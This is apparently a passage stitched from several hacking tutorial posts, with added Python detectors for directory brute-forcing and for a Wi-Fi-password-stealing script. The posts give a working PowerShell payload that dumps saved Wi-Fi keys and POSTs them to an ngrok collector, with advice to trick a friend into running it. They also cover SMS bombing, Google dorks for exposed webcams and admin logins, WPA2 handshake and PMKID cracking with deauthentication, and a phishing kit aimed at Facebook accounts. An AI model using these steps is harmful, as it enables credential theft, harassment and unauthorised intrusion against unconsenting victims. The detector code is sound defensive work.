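        # 3. Probes for files that only exist to be guessed (.htpasswd, VCS metadata, shell history).
        probed = sorted({r["path"] for r in recs if r["path"].endswith(SENSITIVE_SUFFIXES)})
        if probed:
            reasons.append("sensitive path probes: " + ", ".join(probed))
        if reasons:
            findings[ip] = reasons
    return findings


def _line(ip, ts, path, status, ua):
    """Build one constructed combined-format log line."""
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "GET {path} HTTP/1.1" {status} 1108 "-" "{ua}"'


def sample_log():
    """Constructed access log: one gobuster run from 10.0.0.5 and a normal visitor from 10.0.0.9."""
    t0 = datetime(2019, 11, 1, 1, 20, 19, tzinfo=timezone.utc)
    scanner = "gobuster/3.0.1"
    lines = []
    # Wordlist-style names like the run above, almost all missing: 24 x 404 within a few seconds.
    for i, name in enumerate(["bashrc", "cvs", "cvsignore", "forward", "config", "cache",
                              "profile", "history", "mysql_history", "passwd", "listings",
                              "perf", "sh_history", "listing", "rhosts", "subversion", "ssh",
                              "web", "swf", "bash_history", "adm", "borders", "baks", "code"]):
        lines.append(_line("10.0.0.5", t0 + timedelta(milliseconds=200 * i), f"/dvwa/.{name}", 404, scanner))
    lines.append(_line("10.0.0.5", t0 + timedelta(seconds=6), "/dvwa/.htpasswd", 403, scanner))
    lines.append(_line("10.0.0.5", t0 + timedelta(seconds=6), "/dvwa/.svn/entries", 200, scanner))
    # A normal browser session: a couple of pages and one mistyped link.
    browser = "Mozilla/5.0 (X11; Linux x86_64) Firefox/70.0"
    lines.append(_line("10.0.0.9", t0 + timedelta(seconds=30), "/dvwa/login.php", 200, browser))
    lines.append(_line("10.0.0.9", t0 + timedelta(seconds=35), "/dvwa/index.php", 200, browser))
    lines.append(_line("10.0.0.9", t0 + timedelta(seconds=40), "/dvwa/indx.php", 404, browser))
    return lines


if __name__ == "__main__":
    for ip, reasons in detect_bruteforce(sample_log()).items():
        print(ip, "->", "; ".join(reasons))
```

Run it directly to print the findings. In practice the window and miss threshold are tuned to the site's normal 404 rate, and a scanner that sends a custom User-Agent is still caught by the other two signals, which is why the three checks are kept independent.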

Hack Wifi Without Rooting Android Devices
https://www.securitynewspaper.com/2019/09/09/hack-wifi-without-rooting-android-devices/
Mon, 09 Sep 2019 13:21:48 +0000

Aircrack-ng is the most popular way of hacking WiFi passwords, but this method takes a long time, as it relies on a large wordlist to crack AP passwords. It also needs a rooted Android device with Kali installed. We will show you a method to obtain WiFi passwords without rooting the Android device, using a single command line.

We will use the UserLAnd application, which allows installing Kali Linux on Android devices without rooting. Aircrack-ng will not work in UserLAnd, as it requires device root access.

So here we will start a PHP server on the hacker's mobile, use ngrok for port forwarding, and create a payload to execute on the VICTIM's Windows OS.

ON HACKER MOBILE

  • For testing we will use a Xiaomi Redmi Note 4. You have to install
    • UserLand – https://play.google.com/store/apps/details?id=tech.ula&hl=en_IN
    • ConnectBot – https://play.google.com/store/apps/details?id=org.connectbot&hl=en_IN
  • These applications will be used to collect the WiFi passwords.
  • As per the ethical hacking researcher of the International Institute of Cyber Security, UserLAnd allows us to install different Linux distros on a mobile. So here we will install Kali Linux & connect to it with ConnectBot.
  • Click on Kali Linux and enter the password iicybersecurity@12345. You can choose any password.
  • Type su && sudo apt-get update && sudo apt-get install net-tools
  • Type sudo apt-get install unzip && apt-mark build apache*
  • Then type sudo apt-get install php && sudo apt-get install screen
  • Type screen then again type screen

  • Type mkdir phpServer && type cd phpServer
  • Type nano index.php and add the code below.
<html>
 <title> PHP Server </title>
  <body>
  <h1> It works!</h1>
  <?php
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));
  ?>
  </body>
</html>
  • Type php -S 0.0.0.0:80 &
  • Type ps -ef to check whether php is running or not.
  • Go to https://dashboard.ngrok.com/signup and create a new account. Then log in, go to Auth & copy the auth token.
  • Type sudo apt-get install wget && type wget https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
  • Now type unzip ngrok-2.2.8-linux-arm64.zip, this will extract ngrok file in the same directory.
  • Type ./ngrok authtoken <Your authtoken>
  • Type screen
  • Then type ./ngrok http 80
  • Now to run this ngrok in background press key combination of Ctrl+a+n, this will move the ngrok command in background and return to the shell prompt.
  • According to the ethical hacking researcher of the International Institute of Cyber Security, this key combination can differ depending on the mobile model.

  • Save the code below with a .bat extension. For that you can use the WPS Office application. Download WPS Office : https://play.google.com/store/apps/details?id=cn.wps.moffice_eng&hl=en
  • Open the application, click on + & then on Document. Paste the code below into the WPS Office document editor and save the file as payload.txt.
  • Open the file manager and rename payload.txt to payload.bat.
Add-Type -AssemblyName System.Web;

$ngrokServer = "https://SUBDOMAIN.ngrok.io/index.php";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $oXml.Load($path);
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}

}

Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;
  • Now use any social engineering trick to send this payload to your friend. Once your friend opens the payload on a Windows computer (the VICTIM machine), the code above runs. It is PowerShell code; when run in PowerShell it extracts all saved Wi-Fi passwords on the VICTIM system.
  • As commented by the digital forensics expert of International Institute of Cyber Security, the same code is used by some PowerShell-based malware to collect all Wi-Fi passwords from the VICTIM system.

  • You will receive all the stored Wi-Fi passwords on your Android device.
  • Above you can see all the stored Wi-Fi passwords in the /home/iicybersecurity/phpServer/ directory.
  • For more information on other ways to hack Wi-Fi passwords, please follow this YouTube link.
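The PowerShell script above leaves a distinctive footprint for defenders: a netsh wlan show profiles ... key=clear call, parsing of the "Key Content" line, enumeration of the Wlansvc\Profiles store, and an outbound POST of the collected data. The following Python is an added example written for this page (not code from the post, from ngrok or from any other tool mentioned) that scans PowerShell script-block log text for those indicators and grades each block. The log entries are constructed samples; the third one mirrors the behaviour of the script shown above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample script-block entries (e.g. the ScriptBlockText of logged
# PowerShell events). They are not taken from the page; the third mirrors the
# behaviour of the script shown in the post.
SAMPLE_SCRIPT_BLOCKS = [
    # benign: listing saved profiles without exporting keys
    'netsh.exe wlan show profiles',
    # benign: a plain GET to a version file
    'Invoke-WebRequest -Uri https://updates.example.invalid/version.json',
    # suspicious: enumerate every saved profile, export the key, POST the lot
    'foreach ($path in [System.IO.Directory]::EnumerateFiles('
    '"C:\\ProgramData\\Microsoft\\Wlansvc\\Profiles","*.xml","AllDirectories")) { '
    '$netinfo = netsh.exe wlan show profiles name="$ssid" key=clear; '
    '$pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim() }; '
    'Invoke-WebRequest -Uri $ngrokServer -Method POST -Body $sendData',
    # lower confidence: one key exported interactively, nothing sent anywhere
    'netsh wlan show profile name="Office" key=clear',
]

# One regex per behaviour the payload exhibits.
INDICATORS = {
    "wlan_key_export": re.compile(r"wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", re.I),
    "key_content_parse": re.compile(r"Key\s+Content", re.I),
    "profile_store_enum": re.compile(r"Wlansvc\\Profiles", re.I),
    "http_post": re.compile(
        r"(Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient)\b.*?"
        r"(-Method\s+['\"]?POST|-Body\b|Upload(String|Data))",
        re.I | re.S,
    ),
}


@dataclass
class Finding:
    index: int                      # position of the block in the input
    indicators: list = field(default_factory=list)
    severity: str = "info"


def grade(hits):
    """Clear-text key export combined with an outbound POST is the full pattern."""
    if "wlan_key_export" in hits and "http_post" in hits:
        return "high"
    if "wlan_key_export" in hits or "profile_store_enum" in hits:
        return "medium"
    return "info"


def analyse(script_blocks):
    """Return one Finding per block that matches at least one indicator."""
    findings = []
    for i, text in enumerate(script_blocks):
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings.append(Finding(i, hits, grade(hits)))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: {f.severity} {f.indicators}")
```

The grading deliberately treats a lone key=clear export as medium: administrators do run it by hand, so only the combination with an exfiltration primitive (here Invoke-WebRequest with -Method POST or -Body) is rated high. Feed it the ScriptBlockText field of your PowerShell script-block logs instead of the constructed list to use it on real data.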

Fake text message attack. How Prank or hack your Friends with fake SMS Bomber https://www.securitynewspaper.com/2019/09/02/how-prank-or-hack-your-friends-with-fake-sms-bomber/ Mon, 02 Sep 2019 14:40:24 +0000 https://www.securitynewspaper.com/?p=16573

Fake text, fake SMS or fake messages are among the biggest threats the industry is facing. All applications require an account to keep your settings and app usage. While registering through applications, they generally require a mobile number and return an OTP (One Time Password). You may have noticed receiving unnecessary OTPs from different senders many times. Attackers/spammers often use SMS bombing techniques to irritate or disturb their targets.

SMS bombing is a technique of sending fake messages to any mobile number. SMS bombing uses a script containing SMS gateway APIs, combining the APIs of different SMS gateways. According to the ethical hacking researcher of international institute of cyber security, SMS bombers utilize many different gateways. SMS gateway providers offer forwarding, routing and storing of incoming messages. To send messages, the SMS gateway connects with SMSC centers.

Some popular SMS Gateways are :-

  • You can also check free APIs that can be used in creating SMS bomber scripts. Go to: https://rapidapi.com/
  • Nexmo SMS Messaging
  • Twilio SMS
  • TeleSign
  • D7SMS
  • Telnyx
  • MessageBird
  • Click Send (IntelTech)

SMS Bomber Application :-

  • There are different tools used for SMS bombing. BombitUP is one application used for SMS bombing.
  • Download the application: https://www.bombitup.net/
  • Download & install BOMBitUP_v4.03.1.apk
  • Enter the target mobile number & then the number of messages you want to send.
  • Click on BOMBIT
  • You can also set a delay in seconds. The default is 2.5 seconds.
  • Delivery depends on the BombitUP server, but most of the time messages are sent on time.
  • Click on Bombit
  • The screenshot above shows that 10 messages have been sent. Below are the received messages.
  • Above you can see the received messages on the target number.

You can check out the SMS Bomber practical :-

As per the ethical hacking researcher of International Institute of Cyber Security, there are many more ways to send fake SMS or fake messages for social engineering attacks.

Hack Website Using Google Hacking or google Dorking – Part I https://www.securitynewspaper.com/2019/08/21/hack-website-using-google-hacking-or-google-dorking-part-i/ Wed, 21 Aug 2019 16:47:27 +0000 https://www.securitynewspaper.com/?p=16493

You normally use Google for finding anything online; it is the most widely used search engine in the world. Google Hacking is the answer to many of your questions, but you should know that Google can also be used for information gathering, or for finding vulnerabilities in URLs. According to the ethical hacking researcher of international institute of cyber security, many websites can still be hacked using just Google dorks. Google dorks can be used to find vulnerabilities in URLs, and the list of dorks never ends, since new technology brings new vulnerabilities.

How Does Google Dorks Work :-

[Cache]:

  • You must be aware that whenever you visit any website, the website is saved in Google's cache. Using the [Cache] keyword, Google will show its cached web pages.
  • Type cache:securitynewspaper.com
Above screenshot shows Google cache memory.
  • You can also use the options below for opening the cache of any website.
  • Clicking on the cache link will show the above URL with cache information.
  • If you run into a web application firewall, you can use this technique to open a blocked website and view its contents.

[inurl]:

  • This query will search for a keyword in the URL. Type inurl:admin login
  • The screen above shows admin login in every URL.
  • This query can be used to find the admin pages of any website.

[Link]:

  • This query will show result URLs that have links pointing towards hackthissite.org
  • Type link:www.hackthissite.org
  • Above shows the result for hackthissite.org.

[Info]:

  • This query will show the information Google has about the URL.
  • Type info:www.slavehack2.com
  • Above screenshot shows the info about slavehack2.com.

[Related]:

  • This query shows URLs which are similar to the specified URL. Below you can see the specified URL with similar web pages.
  • Type related:testphp.vulnweb.com
  • Above screenshot shows the websites related to testphp.vulnweb.com

[define]:

  • This query will show the definition of the word/query you have searched for.
  • Type define:cyber security
  • Above query shows the definition of the particular keyword we searched for.

[stocks]:

  • To look up the stock price of any company enter stocks:GOOG. Remember to enter the company's ticker symbol, not the company name.
  • Above you can see the Google stocks.

[site]:

  • This query will find all the indexed pages of the target website. For example, site:hackthissite.org will show all the available pages in the search results.
  • Above you can see that all the URLs shown belong to hackthissite.org

[allintitle]:

  • This query will show search results whose title contains all of the given words. Type allintitle:google hack
  • Above screenshot shows results of allintitle with google hack in the title.

[intitle]:

  • This query applies only to the first word after it. For example, if you type intitle:google hack, it will show results with google in the title & hack inside the URL if available.
  • The query above gives google first priority. If you want to match the complete phrase, use the allintitle dork above.

[allinurl]:

  • This query will search for all the keywords entered in the URL. Type allinurl:certifiedhacker
  • This will find certifiedhacker in URLs.
  • Above screenshot shows certifiedhacker in URLs. It might show some of them in the title, but the query only matches the URL.

More Examples Using Google Dorks :-

inurl:admin login <query>

  • Type inurl:admin login <query>. For security reasons we have hidden the query name shown below.
  • This query will show admin logins matching the written names. Here we have used a country name. You can use any query for finding admin logins.
  • Opening the links shows the admin logins. From here other methods of bypassing the logins could be used. Such admin logins should not be open to the public, as brute-force attacks or SQL injection attacks could be used to bypass them.
  • Above screenshots are the admin logins for the query we used. Now using some other queries.
  • Type inurl:admin login.jsp. This query will show all admin pages developed with JSP. Exposing the backend language can also help in the information gathering phase.

[inurl:/view.shtml]:

  • Type inurl:/view.shtml for watching live cams. This query will show web cams that are left with poor security measures or are not configured properly.
  • Above shows the links of open live cams. For example, below you can see open live cams.
  • You can use some other Google dorks for finding open cams.
inurl:/view.shtml
inurl view index.shtml
inurl view index.shtml near me
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:view/index.shtml
inurl:view/view.shtml
intitle:"live view" intitle:axis
intitle:liveapplet
intitle:liveapplet inurl:LvAppl
inurl view index.shtml near my location
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
  • The dorks above can be used for finding open cams.
  • One of the ethical hacking researchers of International Institute of Cyber Security was able to find a secure facility using this approach.

[inurl:admin filetype:<filetype>]:

  • Unprotected files of any type can be found online. Type inurl:admin filetype:xls to find Excel files.
  • Changing the file type will display other files.
  • Above shows Excel & Word files. You can download such files.

Crack any WIFI password With WifiBroot https://www.securitynewspaper.com/2019/08/12/crack-any-wifi-password-with-wifibroot/ Tue, 13 Aug 2019 02:55:45 +0000 https://www.securitynewspaper.com/?p=16441

There are many tools used to crack Wi-Fi access points. Most Wi-Fi authentication uses WPA/WPA2 encryption to secure the network, and cracking WPA2 passwords is still widely practised. According to the ethical hacking researcher of international institute of cyber security, most users still prefer WPA2 authentication for access point security. We will show you how to crack WPA/WPA2 encryption with the four-way handshake & PMKID attacks.

4-Way Handshake :-

The four-way handshake exists so that the wireless client & the access point can each confirm that the other independently knows the PSK. Instead of telling the keys to each other, they exchange messages in encrypted form. The four-way handshake is critical for protecting the PSK from infected access points. The four-way handshake is used to generate the Pairwise Transient Key (PTK).

PMKID :-

PMKID is a unique identifier used by the access point to look up the PMK in use for a client. Using this method, the attacker communicates directly with the vulnerable access point rather than capturing communication between the access point and its clients.

Earlier, the ethical hacking researcher of International institute of cyber security also demonstrated how to hack any wireless network.

Configure Your Wireless Interface :-

  • To configure the wireless interface, connect your wireless adapter to Linux. Open a terminal and type iwconfig to check that the wireless interface is connected. Type airmon-ng check wlan0
  • Type airmon-ng start wlan0
  • Type iwconfig to check that the wireless interface has started in monitor mode.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig
 eth0      no wireless extensions.
 lo        no wireless extensions.
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off

Downloading & Installation of Wifibroot :-

  • We will show how to crack the four-way handshake. For testing we will use Kali Linux 2019.1 amd64.
  • Make sure python3 is installed. For that type sudo apt-get update && sudo apt-get install python3. Then type sudo apt-get install python3-pip
  • Open a terminal and type git clone https://github.com/hash3liZer/WiFiBroot.git
  • Type cd WiFiBroot && ls
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hash3liZer/WiFiBroot.git
 Cloning into 'WiFiBroot'…
 remote: Enumerating objects: 3, done.
 remote: Counting objects: 100% (3/3), done.
 remote: Compressing objects: 100% (3/3), done.
 remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273
 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done.
 Resolving deltas: 100% (166/166), done.
 root@kali:/home/iicybersecurity/Downloads# cd WiFiBroot/
 root@kali:/home/iicybersecurity/Downloads/WiFiBroot# ls
 dicts          handshakes  pull.py    screen.py  wifibroot.py
 exceptions.py  LICENSE     README.md  utils      wireless
  • Type python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py
 Traceback (most recent call last):
   File "wifibroot.py", line 19, in <module>
     from wireless import Shifter
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/__init__.py", line 3, in <module>
     from wireless.cracker import PSK
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/cracker.py", line 6, in <module>
     from pbkdf2 import PBKDF2
 ImportError: No module named pbkdf2
  • If the above error appears, type pip install pbkdf2
  • Then type python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py -h
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
Syntax:
     $ python wifibroot.py [--mode [modes]] [--options]
     $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
 Modes:
     #     Description                                 Value
     01    Capture 4-way handshake and crack MIC code    1
     02    Captures and Crack PMKID (PMKID Attack)       2
     03    Perform Manaul cracking on available
           capture types. See --list-types               3
     04    Deauthentication. Disconnect two stations
           and jam the traffic.                          4
 Use -h, --help after -m, --mode to get help on modes.

Capture & Crack Four-Way Handshake :-

  • Type python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
  • --mode 1 is used to crack the four-way handshake
  • -i wlan0mon is the Wi-Fi adapter used for cracking Wi-Fi networks. For cracking we are using a TP-Link TL-WN722N V1
  • --verbose is used to print hash values.
  • -d is the dictionary path. For testing we are using WiFiBroot's built-in dictionary. You can use any wordlist or crunch for cracking Wi-Fi passwords.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

  NO  ESSID           PWR  ENC    CIPHER    AUTH      CH  BSSID              VENDOR      CL
----  ------------  -----  -----  --------  ------  ----  -----------------  --------  ----
   1  HATHWAY         -38  WPA2   CCMP      PSK       10  8C:E1:17:8D:5C:E4  zte          2
   2  ZTE-ae1e0e      -40  WPA2   CCMP      PSK        1  88:5D:FB:AE:1E:0E  zte          0
   3  MTNL_HOTSPOT    -78  WPA2   TKIP      PSK       11  0C:D2:B5:2C:55:5D  Binatone     1
   4  Neon`Sunny      -87  WPA2   TKIP      PSK        1  34:E3:80:41:F8:68  Genexis      0
   5  TP-LINK_D9D6    -87  WPA2   CCMP      PSK        1  98:DE:D0:A7:D9:D6  TP-LINK      0

  • Press Ctrl + C to stop the scan. Here our target is MTNL_HOTSPOT
  • Enter 3 to crack MTNL_HOTSPOT
 [] Changing Channel to 11 [SuccessFul]  
  • Enter n
[?] AP Clients [1] Scan Further?[Y/n] n 
[] Time Interval [15] -> Implies Gap b/w Frames is 15
  • Then it sends de-authentication frames to the connected clients. Below shows one device connected to the AP.
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication]
  • When the user's device reconnects and re-authenticates, WiFiBroot captures the handshake & then tries the dictionary entries against it to find the password.
[+] Handshake 0CD2B52C555D (Binatone) [Captured]
[!] Handshake not saved. Use -w, --write for saving handshakes.
[^] Current Password: 29054367
[+] Found: 29054367
 [>] PMK:
 00000000:  74 0a ac 04 01 16 0c dd  73 fb 4e fa 50 17 18 7f  |t…….s.N.P…|
 00000010:  a1 c0 92 36 45 20 94 15  79 42 17 bb e2 21 5d 42  |…6E…yB…!]B|
 [>] PTK:
 00000000:  95 5f ee 82 ca c3 a2 b5  b1 a1 75 4a 11 a2 d8 05  |._……..uJ….|
 00000010:  49 08 62 ec 2b b9 e6 12  13 bd f8 53 7a 0d ce a0  |I.b.+……Sz…|
 00000020:  5c 4f d1 ca 04 32 4c bb  f4 6a 27 21 83 26 b3 ad  |\O…2L..j'!.&..|
 00000030:  84 42 fb e4 49 b7 e4 e2  65 03 58 d2 30 f2 35 cb  |.B..I…e.X.0.5.|
 [>] MIC:
 00000000:  da 86 9b 74 b7 d5 aa 67  2a 7d 78 aa 30 0e df e4  |…t…g*}x.0…|
 00000010:  29 9a d2 de                                       |)…|

Capture & Crack PMKID :-

  • Type python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt
  • --mode 2 is used to capture & crack the PMKID.
  • -i wlan0mon is the Wi-Fi adapter used for cracking Wi-Fi networks. For cracking we are using a TP-Link TL-WN722N V1
  • --verbose is used to print hash values.
  • -d is the dictionary path. For testing we are using WiFiBroot's built-in dictionary. You can use any wordlist or crunch for cracking Wi-Fi passwords.
  • -w output.txt will save the PMKID.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.
  • Press Ctrl + C to stop the scan. Here our target is new_T03_T1
NO  ESSID                               PWR  ENC       CIPHER    AUTH      CH  BSSID              VENDOR      CL
 ----  --------------------------------  -----  --------  --------  ------  ----  -----------------  --------  ----
    1  Pankaj@9212458712                   -23  WPA2      CCMP      PSK        6  18:A6:F7:9B:27:DC  TP-LINK      0
    2  Cbi                                 -29  WPA2      CCMP      PSK        2  00:E0:4C:3B:37:08  REALTEK      0
    3  naidus                              -45  WPA       CCMP      PSK        2  C8:3A:35:0B:26:08  Tenda        0
    4  Lucky                               -47  WPA2      TKIP      PSK        1  54:B8:0A:07:82:D2  D-Link       0
    5  new_T03_T1                          -50  WPA2      TKIP      PSK       11  90:8D:78:F2:95:E3  D-Link       3
    6  DIRECT-28-HP DeskJet 2600 series    -59  WPA2      CCMP      PSK        6  B4:B6:86:65:DC:29  Hewlett      0
    7  Worldview@37                        -76  WPA2      CCMP      PSK        1  04:95:E6:A2:58:20  Tenda        0
    8  Sushil@WVC9312408388                -84  WPA       CCMP      PSK       11  0C:D2:B5:3D:0D:3C  Binatone     0
    9  Excitel                             -85  WPA2      CCMP      PSK        6  00:1E:A6:DB:B3:C0  Best         0
   10  Bunty                               -86  WPA2      CCMP      PSK        7  04:95:E6:87:AB:48  Tenda        0
   11  Excitel@43                          -86  WPA2/WPA  CCMP      PSK        7  C8:3A:35:46:BA:F8  Tenda        0
   12  Worldview@tanpreet                  -88  WPA2      TKIP      PSK       13  A0:AB:1B:D9:09:08  D-Link       0
  • Enter 5 to crack new_T03_T1
[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
 [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting…] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated]
[^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4]
[~] Vulnerable to PMKID Attack!
[^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6]
[+] PMKID -> [output.txt] [Saved]
[^] Currently Checking: accessme
[+] Password Found: accessme
[>] PMKID:
 00000000:  61 33 31 66 37 30 63 63  34 65 64 35 63 61 62 62  |a31f70cc4ed5cabb|
 00000010:  36 37 61 65 34 64 35 36  66 31 31 65 63 30 62 36  |67ae4d56f11ec0b6|
 [>] PMK:
 00000000:  93 89 96 03 d0 e8 ab bd  e8 8b f1 1b fb 8f 05 18  |…………….|
 00000010:  58 1e e3 cb 6d 2b ff 0d  b4 96 b4 fa 74 57 bd 77  |X…m+……tW.w| 
  • Above shows the target access point's password.

Hack your friends Facebook account using HiddenEye https://www.securitynewspaper.com/2019/08/02/hack-your-friends-facebook-account-using-hiddeneye/ Fri, 02 Aug 2019 15:16:49 +0000 https://www.securitynewspaper.com/?p=16381

Phishing is how most victims fall into the trap of fake pages. There are many methods for creating fake pages. Phishing is a way to obtain login credentials such as usernames & passwords or confidential details by creating cloned copies of original web pages. According to the ethical hacking researcher of international institute of cyber security, most attacks are done using phishing techniques.

Phishing is still the most popular cyber attack used by many attackers/spammers. We will show a phishing script written in Python. HiddenEye is a modern phishing tool that supports a wide variety of social networks.

  • For testing we will use Ubuntu 16.04.3 LTS 64-bit. Install python3, php7 and wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python3-pip, sudo apt-get install wget.
  • After installing the above requirements, type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
  • Then type cd HiddenEye && ls
  • Type pip3 install -r requirements.txt
  • Type python3 HiddenEye.py
  • Type y
HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y
  • Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
